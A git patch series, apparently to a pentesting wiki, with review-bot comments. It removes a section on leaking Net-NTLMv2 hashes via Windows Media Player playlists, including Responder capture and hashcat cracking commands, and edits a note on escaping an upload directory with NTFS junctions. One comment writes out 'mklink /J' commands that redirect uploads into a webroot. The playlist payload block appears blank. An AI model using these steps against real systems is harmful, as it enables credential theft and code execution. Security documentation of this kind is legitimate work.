From 9a95bc80a3c87139a5eecd7fcca0ef2cd1276e1f Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Sun, 7 Sep 2025 23:21:49 +0200 Subject: [PATCH 1/3] Update phishing-documents.md --- .../phishing-documents.md | 34 +------------------ 1 file changed, 1 insertion(+), 33 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index cb288e2fd..e08280215 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -160,38 +160,6 @@ There are several ways to **force NTLM authentication "remotely"**, for example, ../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md {{#endref}} -### Windows Media Player playlists (.ASX/.WAX) to coerce NTLM - -If a workflow automatically previews media (e.g., HR reviewing uploads) using Windows Media Player, you can leak Net-NTLMv2 by providing a playlist that references a UNC path. When WMP loads the entry, it attempts SMB access with implicit NTLM authentication. - -Example ASX payload (also supported by .WAX): - -```xml - - Leak - - - - - -``` - -Collect and crack the hash: - -```bash -# Capture Net-NTLMv2 -sudo Responder -I -# Or run via uv if you manage dependencies with it -# sudo uv run --script Responder.py -I - -# Crack (hashcat auto-detects NetNTLMv2, mode 5600) -hashcat ntlm.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt -``` - -Notes -- Use ntlm_theft to generate ready-made WMP coercion files: https://github.com/Greenwolf/ntlm_theft -- If NTLM signing/SMB egress is blocked or NTLM disabled, this won’t work. Otherwise, it’s effective when targets auto-open or preview uploaded playlists. - ### NTLM Relay Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**: 
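Review bot: the first hunk deletes the only section that uses ntlm_theft and Responder, but the references list still cites both (they appear as unchanged context in the `@@ -256,4 +224,4 @@` hunk: `- [ntlm_theft – NTLM coercion file generator](https://github.com/Greenwolf/ntlm_theft)` and `- [Responder](https://github.com/lgandx/Responder)`), so after this commit alone the page carries dangling references until PATCH 2/3 lands; fold that cleanup into this commit or squash the two. The commit message ("Update phishing-documents.md") also gives no reason for removing a working Net-NTLMv2 coercion technique: say whether the .ASX/.WAX playlist content was moved to `../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md`, which the `{{#ref}}` directly above the deletion already points to, or why it was judged obsolete, because nothing in the removed text ties WMP resolving a UNC path from a playlist entry to any patched bug. The `\ No newline at end of file` fix in the second hunk is fine.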
@@ -256,4 +224,4 @@ Hunting/IOCs - [ntlm_theft – NTLM coercion file generator](https://github.com/Greenwolf/ntlm_theft) - [Responder](https://github.com/lgandx/Responder) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} From 442465096041302c701eee7225417ff564903c5b Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Sun, 7 Sep 2025 23:23:33 +0200 Subject: [PATCH 2/3] Remove obsolete NTLM references from phishing-documents Removed outdated references related to NTLM vulnerabilities and tools. --- .../phishing-methodology/phishing-documents.md | 4 ---- 1 file changed, 4 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index e08280215..255b6df27 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -219,9 +219,5 @@ Hunting/IOCs - [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/) - [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661) -- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html) -- [Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft](https://www.morphisec.com/blog/5-ntlm-vulnerabilities-unpatched-privilege-escalation-threats-in-microsoft/) -- [ntlm_theft – NTLM coercion file generator](https://github.com/Greenwolf/ntlm_theft) -- [Responder](https://github.com/lgandx/Responder) {{#include ../../banners/hacktricks-training.md}} 
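Review bot: the commit message calls these "obsolete NTLM references", but Responder and ntlm_theft are maintained tools, not obsolete ones; the real reason is that the section using them was deleted in PATCH 1/3, and the message should say so. Dropping `- [Responder](https://github.com/lgandx/Responder)` also over-prunes: the page still explains how to force NTLM authentication remotely and still has the `### NTLM Relay` section, and Responder is the standard tool for capturing the Net-NTLMv2 those sections produce, so keep that entry. Removing the HTB Media writeup deserves a second look too, since its title (`WMP NTLM leak → NTFS junction to webroot RCE`) covers the NTFS-junction upload-directory escape that PATCH 3/3 edits in `src/pentesting-web/file-upload/README.md`; move that reference there rather than drop it from the book. The Morphisec and ntlm_theft entries only supported the deleted section and can go.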
From b397d462ed7d3b254b0658a97841c2dc414c5446 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Mon, 29 Sep 2025 11:12:05 +0200 Subject: [PATCH 3/3] Update README.md --- src/pentesting-web/file-upload/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md index 5d37d138b..0f1d9919c 100644 --- a/src/pentesting-web/file-upload/README.md +++ b/src/pentesting-web/file-upload/README.md @@ -164,7 +164,7 @@ Note that **another option** you may be thinking of to bypass this check is to m ### Escaping upload directory via NTFS junctions (Windows) -When uploads are stored under per-user subfolders on Windows (e.g., C:\Windows\Tasks\Uploads\\) and you control creation/deletion of that subfolder, you can replace it with a directory junction pointing to a sensitive location (e.g., the webroot). Subsequent uploads will be written into the target path, enabling code execution if the target interprets server‑side code. +(For this attack you will need local access to the Windows machine) When uploads are stored under per-user subfolders on Windows (e.g., C:\Windows\Tasks\Uploads\\) and you control creation/deletion of that subfolder, you can replace it with a directory junction pointing to a sensitive location (e.g., the webroot). Subsequent uploads will be written into the target path, enabling code execution if the target interprets server‑side code. Example flow to redirect uploads into XAMPP webroot:
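Review bot: the added parenthetical names a precondition but leaves "local access" undefined, and prepending it to the existing sentence reads awkwardly; make it a sentence of its own and state what is actually required: the attacker must be able to delete the per-user upload subfolder and create a directory junction in its place, which the web upload alone does not give you, so an existing foothold on the host (a low-privileged shell is enough) is needed. It is worth spelling out that directory junctions, unlike NTFS symbolic links, need no special privilege on Windows, so something like `rmdir Uploads\<user>` followed by `mklink /J Uploads\<user> <webroot>` (placeholder names, illustrative only) works from an unprivileged account. The unchanged context path `C:\Windows\Tasks\Uploads\\)` also looks like an escaped placeholder whose name was lost in rendering; check the markdown source so the per-user segment is visible. The subject "Update README.md" should say what changed, e.g. "file-upload: note that the NTFS junction escape requires local access".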